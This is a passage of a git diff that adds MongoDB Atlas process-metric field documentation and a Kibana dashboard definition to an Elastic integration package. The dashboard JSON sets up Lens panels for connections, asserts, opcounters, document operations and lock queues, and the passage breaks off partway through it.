+| mongodb_atlas.process.system.memory.used.max.kb | Max Physical memory used in kilobytes. | double | | counter |
+| mongodb_atlas.process.system.network.in | Incoming network throughput in bytes per second. | double | | gauge |
+| mongodb_atlas.process.system.network.max.in | Max Incoming network throughput in bytes per second. | double | | counter |
+| mongodb_atlas.process.system.network.max.out | Max Outgoing network throughput in bytes per second. | double | | counter |
+| mongodb_atlas.process.system.network.out | Outgoing network throughput in bytes per second. | double | | gauge |
+| mongodb_atlas.process.system.normalized.cpu.guest.max.pct | Max Guest CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.guest.pct | Guest CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | gauge |
+| mongodb_atlas.process.system.normalized.cpu.iowait.max.pct | Max CPU usage of processes spent waiting for IO operations to complete, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.iowait.pct | CPU usage of processes spent waiting for IO operations to complete, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | gauge |
+| mongodb_atlas.process.system.normalized.cpu.irq.max.pct | Max CPU usage of hardware interrupts, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.irq.pct | NORMALIZED irq CPU utilization across various processes for a server | double | percent | gauge |
+| mongodb_atlas.process.system.normalized.cpu.kernel.max.pct | Max kernel CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.kernel.pct | Kernel CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | gauge |
+| mongodb_atlas.process.system.normalized.cpu.nice.max.pct | Max CPU usage of processes with a positive nice value, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.nice.pct | NORMALIZED nice CPU utilization across various processes for a server | double | percent | gauge |
+| mongodb_atlas.process.system.normalized.cpu.softirq.max.pct | Max CPU usage of software interrupts, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.softirq.pct | NORMALIZED softirq CPU utilization across various processes for a server | double | percent | gauge |
+| mongodb_atlas.process.system.normalized.cpu.steal.max.pct | Max The percentage of time the CPU had something runnable, but the hypervisor chose to run something else, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.steal.pct | The percentage of time the CPU had something runnable, but the hypervisor chose to run something else, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | gauge |
+| mongodb_atlas.process.system.normalized.cpu.steal.user.max.pct | Max user CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.steal.user.pct | NORMALIZED CPU user space utilization across various processes for a server | double | percent | gauge |
+| mongodb_atlas.process.system.normalized.cpu.user.max.pct | Max user CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.system.normalized.cpu.user.pct | The portion of CPU time spent executing user space processes and running applications. | double | percent | gauge |
+| mongodb_atlas.process.ticket.available.read.count | The number of read tickets available to the WiredTiger storage engine. | long | | gauge |
+| mongodb_atlas.process.ticket.available.write.count | The number of write tickets available to the WiredTiger storage engine. | long | | gauge |
+| mongodb_atlas.process_id | Combination of hostname and Internet Assigned Numbers Authority (IANA) port that serves the MongoDB process. | keyword | | |
+
diff --git a/packages/mongodb_atlas/img/mongodb_atlas-process-dashboard.png b/packages/mongodb_atlas/img/mongodb_atlas-process-dashboard.png
new file mode 100644
index 00000000000..a611641a908
Binary files /dev/null and b/packages/mongodb_atlas/img/mongodb_atlas-process-dashboard.png differ
diff --git a/packages/mongodb_atlas/kibana/dashboard/mongodb_atlas-b435ef26-546b-4e56-994e-90544e208c72.json b/packages/mongodb_atlas/kibana/dashboard/mongodb_atlas-b435ef26-546b-4e56-994e-90544e208c72.json
new file mode 100644
index 00000000000..9ceb73a7f9b
--- /dev/null
+++ b/packages/mongodb_atlas/kibana/dashboard/mongodb_atlas-b435ef26-546b-4e56-994e-90544e208c72.json
@@ -0,0 +1,2463 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"d0364e5c-0c5b-43bd-a3df-bcc9572f3b2c\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":false,\"width\":\"large\",\"explicitInput\":{\"id\":\"d0364e5c-0c5b-43bd-a3df-bcc9572f3b2c\",\"fieldName\":\"mongodb_atlas.process_id\",\"title\":\"Process ID\",\"grow\":true,\"width\":\"medium\",\"selectedOptions\":[],\"existsSelected\":false,\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "mongodb_atlas.process" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "mongodb_atlas.process" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-cd73b358-0ca8-41b8-98a1-376efe82ebeb", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "cd73b358-0ca8-41b8-98a1-376efe82ebeb": { + "columnOrder": [ + "fd8c7cd5-bf51-4b84-963e-02e291f76939" + ], + "columns": { + "fd8c7cd5-bf51-4b84-963e-02e291f76939": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": 
"\"mongodb_atlas.process.database.size.total.bytes\": *" + }, + "isBucketed": false, + "label": " Database Total Size", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.database.size.total.bytes" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "icon": "empty", + "layerId": "cd73b358-0ca8-41b8-98a1-376efe82ebeb", + "layerType": "data", + "metricAccessor": "fd8c7cd5-bf51-4b84-963e-02e291f76939", + "showBar": false, + "subtitle": "" + } + }, + "title": "Database size [Metrics MongoDB Atlas]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "8f13f3ed-3700-4ea1-9f9a-396a1f1fe178", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "8f13f3ed-3700-4ea1-9f9a-396a1f1fe178", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9cc9c8cf-8031-491d-ad68-65c9bee42961", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9cc9c8cf-8031-491d-ad68-65c9bee42961": { + "columnOrder": [ + "74e8f796-789a-43d1-a887-f52ed019052c", + "14aaad1c-1caf-4a90-bc22-aeccb741fcfb" + ], + "columns": { + "14aaad1c-1caf-4a90-bc22-aeccb741fcfb": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.connections\": *" + }, + "isBucketed": false, + "label": "connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": 
"mongodb_atlas.process.connections" + }, + "74e8f796-789a-43d1-a887-f52ed019052c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "14aaad1c-1caf-4a90-bc22-aeccb741fcfb" + ], + "layerId": "9cc9c8cf-8031-491d-ad68-65c9bee42961", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "74e8f796-789a-43d1-a887-f52ed019052c", + "yConfig": [ + { + "axisMode": "auto", + "color": "#6092c0", + "forAccessor": "14aaad1c-1caf-4a90-bc22-aeccb741fcfb" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "count" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "68be7160-9c8d-46a7-9daa-ee2cf0337f45", + "w": 38, + "x": 10, + "y": 0 + }, + "panelIndex": "68be7160-9c8d-46a7-9daa-ee2cf0337f45", + "title": "Number of connections over time [Metrics MongoDB 
Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9e13bc03-ef64-4c17-aa85-6a64c035c2df", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9e13bc03-ef64-4c17-aa85-6a64c035c2df": { + "columnOrder": [ + "f1ed6868-aad9-4cc3-bf78-a8cac859e7a5", + "c7e30443-618a-4cad-ab44-7c62c66cdaca", + "87067ba0-299a-4b37-8316-f98fab6e650b", + "8c2c5e55-bb96-4171-965e-5a9eb5f5beea", + "fe15665e-e65e-4670-a29c-819f913b0c73" + ], + "columns": { + "87067ba0-299a-4b37-8316-f98fab6e650b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "regular", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.assert.regular" + }, + "8c2c5e55-bb96-4171-965e-5a9eb5f5beea": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "user", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.assert.user" + }, + "c7e30443-618a-4cad-ab44-7c62c66cdaca": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "msg", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.assert.msg" + }, + "f1ed6868-aad9-4cc3-bf78-a8cac859e7a5": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "fe15665e-e65e-4670-a29c-819f913b0c73": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "warning", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + 
"scale": "ratio", + "sourceField": "mongodb_atlas.process.assert.warning" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "c7e30443-618a-4cad-ab44-7c62c66cdaca", + "87067ba0-299a-4b37-8316-f98fab6e650b", + "8c2c5e55-bb96-4171-965e-5a9eb5f5beea", + "fe15665e-e65e-4670-a29c-819f913b0c73" + ], + "layerId": "9e13bc03-ef64-4c17-aa85-6a64c035c2df", + "layerType": "data", + "seriesType": "line", + "xAccessor": "f1ed6868-aad9-4cc3-bf78-a8cac859e7a5", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "" + } + }, + "title": "mongodb_atlas-process", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "25051106-745b-4ba4-a8d9-49034e1f4abb", + "w": 16, + "x": 0, + "y": 9 + }, + "panelIndex": "25051106-745b-4ba4-a8d9-49034e1f4abb", + "title": "Assert states over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d632a616-b51b-4039-af6c-a764c3635443", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + 
"formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "d632a616-b51b-4039-af6c-a764c3635443": { + "columnOrder": [ + "7a81de3b-d112-402e-bd4a-59d91c1f38b2", + "eb15436c-9152-4074-bce9-63eaf87d6ea8", + "e470daec-48de-4dd3-8f95-820af46f3b0e", + "6fd70806-0fdc-46f3-bd72-ea9a394cbaa3" + ], + "columns": { + "6fd70806-0fdc-46f3-bd72-ea9a394cbaa3": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.index.btree.hits.count\": *" + }, + "isBucketed": false, + "label": "hits", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.index.btree.hits.count" + }, + "7a81de3b-d112-402e-bd4a-59d91c1f38b2": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e470daec-48de-4dd3-8f95-820af46f3b0e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.index.btree.miss.count\": *" + }, + "isBucketed": false, + "label": "miss", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.index.btree.miss.count" + }, + "eb15436c-9152-4074-bce9-63eaf87d6ea8": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.index.btree.access.count\": *" + }, + "isBucketed": false, + "label": "access", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.index.btree.access.count" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + 
"layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "6fd70806-0fdc-46f3-bd72-ea9a394cbaa3", + "eb15436c-9152-4074-bce9-63eaf87d6ea8", + "e470daec-48de-4dd3-8f95-820af46f3b0e" + ], + "layerId": "d632a616-b51b-4039-af6c-a764c3635443", + "layerType": "data", + "seriesType": "line", + "xAccessor": "7a81de3b-d112-402e-bd4a-59d91c1f38b2" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "262ae11d-86af-4aa4-b53a-55dabb3bbcc2", + "w": 16, + "x": 16, + "y": 9 + }, + "panelIndex": "262ae11d-86af-4aa4-b53a-55dabb3bbcc2", + "title": "B-tree indexes over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-dec2bdc9-b28b-4737-b097-4784fc539a8e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "dec2bdc9-b28b-4737-b097-4784fc539a8e": { + "columnOrder": [ + "668f07e9-4ede-4fbe-9d08-6c023bb2c714", + "18cc39e3-ab7a-4809-8f67-d69264e1ddf6", + "c97d9c01-61c9-4655-af23-2eebaa65d7b6", + 
"cd716f48-2a24-45bd-ac5c-21bb1fb265b2", + "37103fc1-5df4-41d7-8e3d-64a0215d2cd8" + ], + "columns": { + "18cc39e3-ab7a-4809-8f67-d69264e1ddf6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "cmd", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.opcounter.cmd" + }, + "37103fc1-5df4-41d7-8e3d-64a0215d2cd8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "insert", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.opcounter.insert" + }, + "668f07e9-4ede-4fbe-9d08-6c023bb2c714": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "c97d9c01-61c9-4655-af23-2eebaa65d7b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "delete", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.opcounter.delete" + }, + "cd716f48-2a24-45bd-ac5c-21bb1fb265b2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "getmore", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.opcounter.getmore" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + 
"gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "18cc39e3-ab7a-4809-8f67-d69264e1ddf6", + "c97d9c01-61c9-4655-af23-2eebaa65d7b6", + "cd716f48-2a24-45bd-ac5c-21bb1fb265b2", + "37103fc1-5df4-41d7-8e3d-64a0215d2cd8" + ], + "layerId": "dec2bdc9-b28b-4737-b097-4784fc539a8e", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "668f07e9-4ede-4fbe-9d08-6c023bb2c714" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Average" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "20587478-8b77-4d72-ab6f-0e4781c04306", + "w": 16, + "x": 32, + "y": 18 + }, + "panelIndex": "20587478-8b77-4d72-ab6f-0e4781c04306", + "title": "Opcounter operations over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a642128d-1d1f-433c-9412-738ea3def1fb", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "a642128d-1d1f-433c-9412-738ea3def1fb": { + "columnOrder": [ + "ead4bce5-a55b-4efa-84c2-b1f92e778c8d", + "0c7ad04a-7741-4dc7-ac17-97ee29dbb865", + "f68edb12-70dd-4291-ad51-031dcf826a3d", + "8bb370a4-15d0-4956-a6fb-a80f64891a4f", + "d3bc1949-119f-4c77-8d78-839f168c26dc" + ], + "columns": { + "0c7ad04a-7741-4dc7-ac17-97ee29dbb865": { + "customLabel": true, + "dataType": "number", + "filter": { + 
"language": "kuery", + "query": "\"mongodb_atlas.process.document.inserted\": *" + }, + "isBucketed": false, + "label": "inserted", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.document.inserted" + }, + "8bb370a4-15d0-4956-a6fb-a80f64891a4f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.document.updated\": *" + }, + "isBucketed": false, + "label": "updated", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.document.updated" + }, + "d3bc1949-119f-4c77-8d78-839f168c26dc": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.document.returned\": *" + }, + "isBucketed": false, + "label": "returned", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.document.returned" + }, + "ead4bce5-a55b-4efa-84c2-b1f92e778c8d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "f68edb12-70dd-4291-ad51-031dcf826a3d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.document.deleted\": *" + }, + "isBucketed": false, + "label": "deleted", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.document.deleted" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + 
"internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "0c7ad04a-7741-4dc7-ac17-97ee29dbb865", + "f68edb12-70dd-4291-ad51-031dcf826a3d", + "8bb370a4-15d0-4956-a6fb-a80f64891a4f", + "d3bc1949-119f-4c77-8d78-839f168c26dc" + ], + "layerId": "a642128d-1d1f-433c-9412-738ea3def1fb", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ead4bce5-a55b-4efa-84c2-b1f92e778c8d" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "c0fee763-07b4-4e33-9435-f5953a528bfc", + "w": 16, + "x": 0, + "y": 18 + }, + "panelIndex": "c0fee763-07b4-4e33-9435-f5953a528bfc", + "title": "Document operations over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-cd89a53e-75f8-4ccd-9234-05124250cc7b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "cd89a53e-75f8-4ccd-9234-05124250cc7b": { + "columnOrder": [ + "98425ac2-3325-414a-a990-b290ad0ebdf2", + "9e1d1374-9c80-4d65-9ecd-4ae5c898bf9c", + 
"430fe7e4-1762-4390-b786-6d91aac55994" + ], + "columns": { + "430fe7e4-1762-4390-b786-6d91aac55994": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.global.lock.current_queue.writer.count\": *" + }, + "isBucketed": false, + "label": "writer", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.global.lock.current_queue.writer.count" + }, + "98425ac2-3325-414a-a990-b290ad0ebdf2": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9e1d1374-9c80-4d65-9ecd-4ae5c898bf9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.global.lock.current_queue.reader.count\": *" + }, + "isBucketed": false, + "label": "reader", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.global.lock.current_queue.reader.count" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "9e1d1374-9c80-4d65-9ecd-4ae5c898bf9c", + "430fe7e4-1762-4390-b786-6d91aac55994" + ], + "layerId": 
"cd89a53e-75f8-4ccd-9234-05124250cc7b", + "layerType": "data", + "seriesType": "line", + "xAccessor": "98425ac2-3325-414a-a990-b290ad0ebdf2", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "Global lock Data", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "d3f6c424-e228-438c-8b54-e7229f252220", + "w": 16, + "x": 16, + "y": 18 + }, + "panelIndex": "d3f6c424-e228-438c-8b54-e7229f252220", + "title": "Number of operations queued and waiting for lock [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-4bae4135-aa8b-47ba-bbd7-6a22b4b3697c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "4bae4135-aa8b-47ba-bbd7-6a22b4b3697c": { + "columnOrder": [ + "9ea8b9a9-be57-40fd-8afd-34037f25342c", + "6444b274-4ebe-4898-8cef-5271e9e1ff54", + 